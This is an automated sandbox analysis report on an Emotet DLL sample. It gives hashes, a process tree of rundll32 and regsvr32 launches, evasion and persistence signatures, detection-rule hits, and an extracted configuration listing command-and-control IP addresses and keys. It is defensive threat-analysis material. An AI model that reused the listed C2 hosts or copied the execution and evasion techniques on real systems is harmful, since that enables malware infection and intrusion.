Windows Analysis Report ALNgwfVtrB

Overview

General Information

Sample Name: ALNgwfVtrB (renamed file extension from none to dll)
Analysis ID: 553377
MD5: 61308ba77d051e4e76e532f9709635e0
SHA1: 95d2cd6c7be346d29735ed970d3f373d37b7e13f
SHA256: bd2c1b86de45c3e9d0d7c85322228c3512ce2c041765d95bb613cdf12647bea9
Tags: 32, dll, exe
Detection

Emotet
Score: 92
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Multi AV Scanner detection for submitted file
Yara detected Emotet
System process connects to network (likely due to code injection or exploit)
Sigma detected: Suspicious Call by Ordinal
C2 URLs / IPs found in malware configuration
Hides that the sample has been downloaded from the Internet (zone.identifier)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
One or more processes crash
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query locales information (e.g. system language)
Deletes files inside the Windows folder
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Creates files inside the system directory
Detected potential crypto function
Found potential string decryption / allocating functions
Found evasive API chain (may stop execution after checking a module file name)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to dynamically determine API calls
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a DirectInput object (often for capturing keystrokes)
AV process strings found (often used to terminate AV products)
PE file contains an invalid checksum
PE file contains strange resources
Tries to load missing DLLs
Contains functionality to read the PEB
Drops PE files to the windows directory (C:\Windows)
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Detected TCP or UDP traffic on non-standard ports
Checks if the current process is being debugged
Connects to several IPs in different countries
Registers a DLL
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries disk information (often used to detect virtual machines)
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Process Tree

  • System is w10x64
  • loaddll32.exe (PID: 6764 cmdline: loaddll32.exe "C:\Users\user\Desktop\ALNgwfVtrB.dll" MD5: 7DEB5DB86C0AC789123DEC286286B938)
    • cmd.exe (PID: 4616 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\ALNgwfVtrB.dll",#1 MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • rundll32.exe (PID: 6048 cmdline: rundll32.exe "C:\Users\user\Desktop\ALNgwfVtrB.dll",#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
        • rundll32.exe (PID: 6980 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\ALNgwfVtrB.dll",DllRegisterServer MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
          • rundll32.exe (PID: 4668 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Mhgwckn\ikgetkts.aey",QTEnBIyMIuE MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
            • rundll32.exe (PID: 4584 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\Mhgwckn\ikgetkts.aey",DllRegisterServer MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • regsvr32.exe (PID: 3408 cmdline: regsvr32.exe /s C:\Users\user\Desktop\ALNgwfVtrB.dll MD5: 426E7499F6A7346F0410DEAD0805586B)
      • rundll32.exe (PID: 400 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\ALNgwfVtrB.dll",DllRegisterServer MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 6800 cmdline: rundll32.exe C:\Users\user\Desktop\ALNgwfVtrB.dll,DllRegisterServer MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • WerFault.exe (PID: 6496 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6764 -s 528 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
  • svchost.exe (PID: 5264 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 4588 cmdline: C:\Windows\System32\svchost.exe -k WerSvcGroup MD5: 32569E403279B3FD2EDB7EBD036273FA)
    • WerFault.exe (PID: 4680 cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 164 -p 6764 -ip 6764 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
  • svchost.exe (PID: 5688 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 5796 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 4532 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 2932 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: 32569E403279B3FD2EDB7EBD036273FA)

Malware Configuration

Threatname: Emotet

{"C2 list": ["45.138.98.34:80", "69.16.218.101:8080", "51.210.242.234:8080", "185.148.168.220:8080", "142.4.219.173:8080", "54.38.242.185:443", "191.252.103.16:80", "104.131.62.48:8080", "62.171.178.147:8080", "217.182.143.207:443", "168.197.250.14:80", "37.44.244.177:8080", "66.42.57.149:443", "210.57.209.142:8080", "159.69.237.188:443", "116.124.128.206:8080", "128.199.192.135:8080", "195.154.146.35:443", "185.148.168.15:8080", "195.77.239.39:8080", "207.148.81.119:8080", "85.214.67.203:8080", "190.90.233.66:443", "78.46.73.125:443", "78.47.204.80:443", "37.59.209.141:8080", "54.37.228.122:443"], "Public Key": ["RUNLMSAAAADYNZPXY4tQxd/N4Wn5sTYAm5tUOxY2ol1ELrI4MNhHNi640vSLasjYTHpFRBoG+o84vtr7AJachCzOHjaAJFCW", "RUNTMSAAAAD0LxqDNhonUYwk8sqo7IWuUllRdUiUBnACc6romsQoe1YJD7wIe4AheqYofpZFucPDXCZ0z9i+ooUffqeoLZU0"]}

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000006.00000002.388319825.0000000005640000.00000040.00000001.sdmp | JoeSecurity_Emotet_1 | Yara detected Emotet | Joe Security |
00000006.00000002.388061342.00000000053B1000.00000020.00000001.sdmp | JoeSecurity_Emotet_1 | Yara detected Emotet | Joe Security |
00000006.00000002.388938400.0000000005A60000.00000040.00000001.sdmp | JoeSecurity_Emotet_1 | Yara detected Emotet | Joe Security |
00000005.00000002.425302680.00000000054F1000.00000020.00000001.sdmp | JoeSecurity_Emotet_1 | Yara detected Emotet | Joe Security |
00000006.00000002.388421865.00000000056A0000.00000040.00000001.sdmp | JoeSecurity_Emotet_1 | Yara detected Emotet | Joe Security |
(31 further entries not shown)

Unpacked PEs

Source | Rule | Description | Author | Strings
5.2.rundll32.exe.5200000.2.unpack | JoeSecurity_Emotet_1 | Yara detected Emotet | Joe Security |
6.2.rundll32.exe.5a90000.13.unpack | JoeSecurity_Emotet_1 | Yara detected Emotet | Joe Security |
5.2.rundll32.exe.54c0000.4.unpack | JoeSecurity_Emotet_1 | Yara detected Emotet | Joe Security |
4.2.rundll32.exe.46a0000.0.raw.unpack | JoeSecurity_Emotet_1 | Yara detected Emotet | Joe Security |
6.2.rundll32.exe.53b0000.3.unpack | JoeSecurity_Emotet_1 | Yara detected Emotet | Joe Security |
(49 further entries not shown)

Sigma Overview

System Summary:

Sigma detected: Suspicious Call by Ordinal
Source: Process started, Author: Florian Roth, Data: Command: rundll32.exe "C:\Users\user\Desktop\ALNgwfVtrB.dll",#1, CommandLine: rundll32.exe "C:\Users\user\Desktop\ALNgwfVtrB.dll",#1, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\rundll32.exe, NewProcessName: C:\Windows\SysWOW64\rundll32.exe, OriginalFileName: C:\Windows\SysWOW64\rundll32.exe, ParentCommandLine: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\ALNgwfVtrB.dll",#1, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 4616, ProcessCommandLine: rundll32.exe "C:\Users\user\Desktop\ALNgwfVtrB.dll",#1, ProcessId: 6048

Jbx Signature Overview

AV Detection:

Found malware configuration
Source: 0.2.loaddll32.exe.b50000.0.raw.unpack, Malware Configuration Extractor: Emotet
Multi AV Scanner detection for submitted file
Source: ALNgwfVtrB.dll, Virustotal: Detection: 15%
Source: ALNgwfVtrB.dll, Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic, Snort IDS: 2404332 ET CNC Feodo Tracker Reported CnC Server TCP group 17 192.168.2.6:49727 -> 45.138.98.34:80
Source: Traffic, Snort IDS: 2404338 ET CNC Feodo Tracker Reported CnC Server TCP group 20 192.168.2.6:49728 -> 69.16.218.101:8080
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\SysWOW64\rundll32.exe, Network Connect: 69.16.218.101 144
Source: C:\Windows\SysWOW64\rundll32.exe, Network Connect: 45.138.98.34 80
C2 URLs / IPs found in malware configuration
Source: global traffic, TCP traffic: 192.168.2.6:49728 -> 69.16.218.101:8080
Source: unknown, Network traffic detected: IP country count 12
Source: unknown, TCP traffic detected without corresponding DNS query: 45.138.98.34
Source: unknown, TCP traffic detected without corresponding DNS query: 69.16.218.101
ore.notSupported_8wekyb3d8bbwe"],"ExperienceIds":[],"MaxDownloadSizeInBytes":104380919,"MaxInstallSizeInBytes":203345920,"PackageFormat":"Appx","PackageFamilyName":"SpotifyAB.SpotifyMusic_zpdnekdrzrea0","MainPackageFamilyNameForDlc":null,"PackageFullName":"SpotifyAB.SpotifyMusic_1.176.447.0_x86__zpdnekdrzrea0","PackageId":"3fbafb47-f476-4c26-4445-49acb9a726e6-X86","PackageRank":30001,"PlatformDependencies":[{"MaxTested":2814750754275328,"MinVersion":2814750710366559,"PlatformName":"Windows.Desktop"}],"PlatformDependencyXmlBlob":"{\"blob.version\":1688867040526336,\"content.isMain\":false,\"content.packageId\":\"SpotifyAB.SpotifyMusic_1.176.447.0_x86__zpdnekdrzrea0\",\"content.productId\":\"caac1b9d-621b-4f96-b143-e10e1397740a\",\"content.targetPlatforms\":[{\"platform.maxVersionTested\":2814750754275328,\"platform.minVersion\":2814750710366559,\"platform.target\":3}],\"content.type\":7,\"policy\":{\"category.first\":\"app\",\"category.second\":\"Music\",\"optOut.backupRestore\":true,\"optOut.removeableMedia\":false},\"policy2\":{\"ageRating\":3,\"optOut.DVR\":false,\"thirdPartyAppRatings\":[{\"level\":9,\"systemId\":3},{\"leve
                      Source: svchost.exe, 00000015.00000003.511379311.000001E0BD5A2000.00000004.00000001.sdmpString found in binary or memory: trings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","SkuTitle":"Spotify - Music and Podcasts","Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"ProductId":"9NCBCSZSJRSB","Properties":{"FulfillmentData":{"ProductId":"9NCBCSZSJRSB","WuCategoryId":"5c353b9c-7ac7-4d27-af07-923e7d9aa2e2","PackageFamilyName":"SpotifyAB.SpotifyMusic_zpdnekdrzrea0","SkuId":"0011"},"FulfillmentType":"WindowsUpdate","FulfillmentPluginId":null,"Packages":[{"Applications":[{"ApplicationId":"Spotify"}],"Architectures":["x86"],"Capabilities":["internetClient","runFullTrust","Microsoft.storeFilter.c
ore.notSupported_8wekyb3d8bbwe"],"ExperienceIds":[],"MaxDownloadSizeInBytes":104380919,"MaxInstallSizeInBytes":203345920,"PackageFormat":"Appx","PackageFamilyName":"SpotifyAB.SpotifyMusic_zpdnekdrzrea0","MainPackageFamilyNameForDlc":null,"PackageFullName":"SpotifyAB.SpotifyMusic_1.176.447.0_x86__zpdnekdrzrea0","PackageId":"3fbafb47-f476-4c26-4445-49acb9a726e6-X86","PackageRank":30001,"PlatformDependencies":[{"MaxTested":2814750754275328,"MinVersion":2814750710366559,"PlatformName":"Windows.Desktop"}],"PlatformDependencyXmlBlob":"{\"blob.version\":1688867040526336,\"content.isMain\":false,\"content.packageId\":\"SpotifyAB.SpotifyMusic_1.176.447.0_x86__zpdnekdrzrea0\",\"content.productId\":\"caac1b9d-621b-4f96-b143-e10e1397740a\",\"content.targetPlatforms\":[{\"platform.maxVersionTested\":2814750754275328,\"platform.minVersion\":2814750710366559,\"platform.target\":3}],\"content.type\":7,\"policy\":{\"category.first\":\"app\",\"category.second\":\"Music\",\"optOut.backupRestore\":true,\"optOut.removeableMedia\":false},\"policy2\":{\"ageRating\":3,\"optOut.DVR\":false,\"thirdPartyAppRatings\":[{\"level\":9,\"systemId\":3},{\"leve
                      Source: svchost.exe, 00000015.00000002.528158834.000001E0BD500000.00000004.00000001.sdmp, svchost.exe, 00000018.00000002.863748399.000002E116062000.00000004.00000001.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                      Source: 77EC63BDA74BD0D0E0426DC8F80085060.11.dr String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
                      Source: svchost.exe, 00000015.00000003.503188635.000001E0BD571000.00000004.00000001.sdmp String found in binary or memory: http://help.disneyplus.com.
                      Source: Amcache.hve.9.dr String found in binary or memory: http://upx.sf.net
                      Source: svchost.exe, 00000015.00000003.503188635.000001E0BD571000.00000004.00000001.sdmp String found in binary or memory: https://disneyplus.com/legal.
                      Source: svchost.exe, 00000015.00000003.503188635.000001E0BD571000.00000004.00000001.sdmp String found in binary or memory: https://www.disneyplus.com/legal/privacy-policy
                      Source: svchost.exe, 00000015.00000003.503188635.000001E0BD571000.00000004.00000001.sdmp String found in binary or memory: https://www.disneyplus.com/legal/your-california-privacy-rights
                      Source: svchost.exe, 00000015.00000003.504317499.000001E0BD583000.00000004.00000001.sdmp, svchost.exe, 00000015.00000003.504779704.000001E0BDA19000.00000004.00000001.sdmp, svchost.exe, 00000015.00000003.504403415.000001E0BD594000.00000004.00000001.sdmp, svchost.exe, 00000015.00000003.504445076.000001E0BD5A5000.00000004.00000001.sdmp String found in binary or memory: https://www.tiktok.com/legal/report/feedback
                      Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_10001280 recvfrom,3_2_10001280
                      Source: loaddll32.exe, 00000000.00000000.380317596.0000000000D6B000.00000004.00000020.sdmp Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

                      E-Banking Fraud:

                      Yara detected Emotet

                      System Summary:

                      Source: ALNgwfVtrB.dll Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
                      Source: C:\Windows\System32\svchost.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 164 -p 6764 -ip 6764
                      Source: C:\Windows\SysWOW64\rundll32.exe File deleted: C:\Windows\SysWOW64\Mhgwckn\ikgetkts.aey:Zone.Identifier
                      Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Windows\SysWOW64\Sqvvzhazj\
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_036655FF5_2_036655FF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_03664BFC5_2_03664BFC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_036727F95_2_036727F9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_0367E1F85_2_0367E1F8
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_0367C5D55_2_0367C5D5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_0366E7DE5_2_0366E7DE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_0367FBDE5_2_0367FBDE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_036807AA5_2_036807AA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_036677A35_2_036677A3
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_03678FAE5_2_03678FAE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_036817BD5_2_036817BD
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_0366BFBE5_2_0366BFBE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_0367D1BC5_2_0367D1BC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_036657B85_2_036657B8
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_036761875_2_03676187
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_03670F865_2_03670F86
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_03673D855_2_03673D85
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_0366FB8E5_2_0366FB8E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_0366238C5_2_0366238C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_036621945_2_03662194
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_036832635_2_03683263
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_03680A645_2_03680A64
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_0367A4745_2_0367A474
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_0367DC715_2_0367DC71
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_0366A8715_2_0366A871
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_0367567B5_2_0367567B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_036670785_2_03667078
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_03667E795_2_03667E79
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_036742445_2_03674244
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_036674425_2_03667442
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_0366E6405_2_0366E640
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_0367F8405_2_0367F840
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_0367B2575_2_0367B257
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_03672E5D5_2_03672E5D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_0366B8205_2_0366B820
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_036634315_2_03663431
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_036788065_2_03678806
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_03679A015_2_03679A01
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_03683EE95_2_03683EE9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_0367E4E55_2_0367E4E5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_036800EF5_2_036800EF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_0366F0E95_2_0366F0E9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_0367BEFD5_2_0367BEFD
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_036680C05_2_036680C0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_0367CAD55_2_0367CAD5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_0367D8DB5_2_0367D8DB
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_0367CCD95_2_0367CCD9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_0367A2A55_2_0367A2A5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_036836AA5_2_036836AA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_03661CA15_2_03661CA1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_03673EAA5_2_03673EAA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_0366BAA95_2_0366BAA9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_036846BD5_2_036846BD
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_03670EBC5_2_03670EBC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_03670ABA5_2_03670ABA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_0366C6B85_2_0366C6B8
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: String function: 10030E38 appears 38 times
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: String function: 10030535 appears 40 times
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 10030E38 appears 45 times
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 10030535 appears 32 times
                      Source: ALNgwfVtrB.dllStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sfc.dllJump to behavior
                      Source: ALNgwfVtrB.dllVirustotal: Detection: 15%
                      Source: ALNgwfVtrB.dllStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      Source: C:\Windows\System32\loaddll32.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: unknownProcess created: C:\Windows\System32\loaddll32.exe loaddll32.exe "C:\Users\user\Desktop\ALNgwfVtrB.dll"
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\ALNgwfVtrB.dll",#1
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\ALNgwfVtrB.dll
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\ALNgwfVtrB.dll",#1
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\ALNgwfVtrB.dll,DllRegisterServer
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\ALNgwfVtrB.dll",DllRegisterServer
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k WerSvcGroup
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 164 -p 6764 -ip 6764
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6764 -s 528
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Mhgwckn\ikgetkts.aey",QTEnBIyMIuE
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\Mhgwckn\ikgetkts.aey",DllRegisterServer
                      Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\ALNgwfVtrB.dll",DllRegisterServer
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6764 -s 528Jump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
                      Source: C:\Windows\System32\svchost.exeFile created: C:\ProgramData\Microsoft\Windows\WER\Temp\WER178B.tmpJump to behavior
                      Source: classification engineClassification label: mal92.troj.evad.winDLL@28/15@0/28
                      Source: C:\Windows\SysWOW64\rundll32.exeFile read: C:\Users\desktop.iniJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \BaseNamedObjects\Local\SM0:4680:64:WilError_01
                      Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6764
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_10021183 LoadResource,LockResource,SizeofResource,3_2_10021183
                      Source: C:\Windows\SysWOW64\rundll32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: ALNgwfVtrB.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                      Source: ALNgwfVtrB.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                      Source: ALNgwfVtrB.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                      Source: ALNgwfVtrB.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                      Source: ALNgwfVtrB.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00D31195 push cs; iretd 0_2_00D31197
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_1003060D push ecx; ret 3_2_10030620
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_1003060D push ecx; ret 4_2_10030620
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_10030E7D push ecx; ret 4_2_10030E90
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_03661195 push cs; iretd 5_2_03661197
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_1003E278 LoadLibraryA,GetProcAddress,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,3_2_1003E278
                      Source: ALNgwfVtrB.dllStatic PE information: real checksum: 0x970bf should be: 0x9d4b2
                      Source: C:\Windows\SysWOW64\rundll32.exePE file moved: C:\Windows\SysWOW64\Mhgwckn\ikgetkts.aeyJump to behavior

                      Hooking and other Techniques for Hiding and Protection:

                      Hides that the sample has been downloaded from the Internet (zone.identifier)
                      Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\SysWOW64\Sqvvzhazj\lzmoqnoyzvyzrne.eqq:Zone.Identifier read attributes | deleteJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\SysWOW64\Mhgwckn\ikgetkts.aey:Zone.Identifier read attributes | deleteJump to behavior
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_100250A3 IsIconic,GetWindowPlacement,GetWindowRect,3_2_100250A3
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_100250A3 IsIconic,GetWindowPlacement,GetWindowRect,4_2_100250A3
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_1001DFC0 IsIconic,SendMessageA,GetSystemMetrics,GetSystemMetrics,GetClientRect,DrawIcon,4_2_1001DFC0
                      Source: C:\Windows\SysWOW64\rundll32.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
